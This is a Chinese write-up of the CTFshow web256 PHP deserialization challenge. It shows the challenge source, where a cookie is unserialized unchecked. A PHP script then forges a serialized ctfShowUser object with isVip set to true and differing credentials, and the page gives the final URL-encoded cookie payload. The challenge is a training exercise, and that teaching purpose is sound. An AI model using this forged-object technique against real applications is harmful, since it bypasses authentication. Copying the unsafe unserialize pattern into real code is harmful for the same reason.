CTFshow 反序列化 web256

目录


源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}


思路

这题关键点在于让username不等于password,因为都是用===比较,所以我们传入的username和password值不同就好了,然后再源码里改成响应的值然后反序列化就好啦,反序列化是可以修改变量的值的
if($this->username!==$this->password){

比如我传入username=x,password=y,那么只要把类里的username和password的值改成x和y再反序列化就满足条件啦

<?php
class ctfShowUser{
    public $username='x';
    public $password='y';
    public $isVip=true;
}

echo(urlencode(serialize(new ctfShowUser())));

题解

CTFshow 反序列化 web256

get:?username=x&password=y
cookie: user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22x%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%22y%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

总结

水题

上一篇:python 数据库编程,这篇是针对 mysql 的,滚雪球学Python第4季第13篇


下一篇:.net 6.0 identity实现